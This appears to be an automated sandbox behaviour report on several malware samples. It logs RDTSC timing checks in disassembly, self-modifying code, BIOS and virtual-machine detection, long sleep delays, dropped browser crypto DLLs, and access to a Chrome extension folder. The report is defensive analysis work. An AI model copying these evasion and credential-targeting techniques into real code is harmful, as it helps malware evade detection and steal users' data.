Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C0030D second address: 4C00365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F749F3F2507h 0x0000000f jmp 00007F742CC4420Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 jmp 00007F742CC44210h 0x0000001c or edx, dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 call 00007F742CC4420Eh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00365 second address: 4C003BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dx, 3444h 0x00000009 popad 0x0000000a test edx, 61000000h 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 mov ecx, 6DCD1661h 0x00000019 popad 0x0000001a jne 00007F749F6664CFh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F742CEB81D9h 0x00000029 or ecx, 33FAFEE6h 0x0000002f jmp 00007F742CEB81D1h 0x00000034 popfd 0x00000035 mov cx, 0D17h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C003BF second address: 4C003DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44218h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C003DB second address: 4C003F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F742CEB81CAh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C003F3 second address: 4C00405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00405 second address: 4C00420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F749F666451h 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00420 second address: 4C00431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov cl, 9Bh 0x00000007 popad 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00431 second address: 4C00435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00435 second address: 4C00447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C00447 second address: 4C0044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0805 second address: 4BF0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7004h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F742CC44216h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F742CC44217h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0842 second address: 4BF0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0848 second address: 4BF084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF084C second address: 4BF0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0850 second address: 4BF0891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F742CC44217h 0x0000000f and esp, FFFFFFF8h 0x00000012 jmp 00007F742CC44216h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0891 second address: 4BF0895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0895 second address: 4BF089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF089B second address: 4BF08F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F742CEB81D2h 0x00000008 call 00007F742CEB81D2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ax, 0A49h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d movzx esi, dx 0x00000020 mov eax, edx 0x00000022 popad 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F742CEB81D5h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF08F0 second address: 4BF090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF090E second address: 4BF0921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0921 second address: 4BF0974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F742CC4420Fh 0x00000009 add ecx, 634C176Eh 0x0000000f jmp 00007F742CC44219h 0x00000014 popfd 0x00000015 mov bl, al 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F742CC44216h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0974 second address: 4BF09E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F742CEB81CFh 0x00000010 test esi, esi 0x00000012 jmp 00007F742CEB81D6h 0x00000017 je 00007F749F66DBA8h 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F742CEB81CCh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F742CEB81D8h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF09E5 second address: 4BF0A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F742CC44216h 0x00000010 je 00007F749F3F9B9Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0A17 second address: 4BF0A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0A1F second address: 4BF0AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushfd 0x00000007 jmp 00007F742CC44217h 0x0000000c adc ecx, 4EA0A50Eh 0x00000012 jmp 00007F742CC44219h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test byte ptr [77436968h], 00000002h 0x00000022 jmp 00007F742CC4420Eh 0x00000027 jne 00007F749F3F9B47h 0x0000002d pushad 0x0000002e jmp 00007F742CC4420Eh 0x00000033 mov esi, 7E644C91h 0x00000038 popad 0x00000039 mov edx, dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F742CC44213h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0AA8 second address: 4BF0AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0AC0 second address: 4BF0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0AC4 second address: 4BF0BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F742CEB81CCh 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F742CEB81D0h 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 jmp 00007F742CEB81CEh 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F742CEB81D7h 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F742CEB81D6h 0x0000002c push dword ptr [ebp+14h] 0x0000002f pushad 0x00000030 call 00007F742CEB81CEh 0x00000035 movzx esi, dx 0x00000038 pop edx 0x00000039 jmp 00007F742CEB81CCh 0x0000003e popad 0x0000003f push dword ptr [ebp+10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F742CEB81CDh 0x0000004b sub ecx, 123DF036h 0x00000051 jmp 00007F742CEB81D1h 0x00000056 popfd 0x00000057 pushfd 0x00000058 jmp 00007F742CEB81D0h 0x0000005d jmp 00007F742CEB81D5h 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0C2C second address: 4BF0C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F742CC4420Ch 0x00000012 jmp 00007F742CC44215h 0x00000017 popfd 0x00000018 jmp 00007F742CC44210h 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F742CC44217h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF0C92 second address: 4BF0C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46DC2F second address: 46DC55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F742CC44206h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 2BCAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 464043 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 46962A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 2BCA3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Special instruction interceptor: First address: 4EF68F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 28CAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 434043 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 43962A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 28CA3E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 4BF68F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Code function: 8_2_04C70C55 rdtsc 8_2_04C70C55
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3583
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1759
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1189
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1098
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 353
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 548
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Window / User API: threadDelayed 657
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe TID: 3640 Thread sleep count: 189 > 30
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 1976 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2784 Thread sleep count: 1189 > 30
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2784 Thread sleep time: -2379189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2156 Thread sleep count: 1098 > 30
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 2156 Thread sleep time: -2197098s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6912 Thread sleep count: 353 > 30
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6912 Thread sleep time: -10590000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7260 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7128 Thread sleep count: 548 > 30
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7128 Thread sleep time: -1096548s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe TID: 7360 Thread sleep count: 657 > 30
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe TID: 7360 Thread sleep count: 275 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C7DC930
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.0000000001634000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
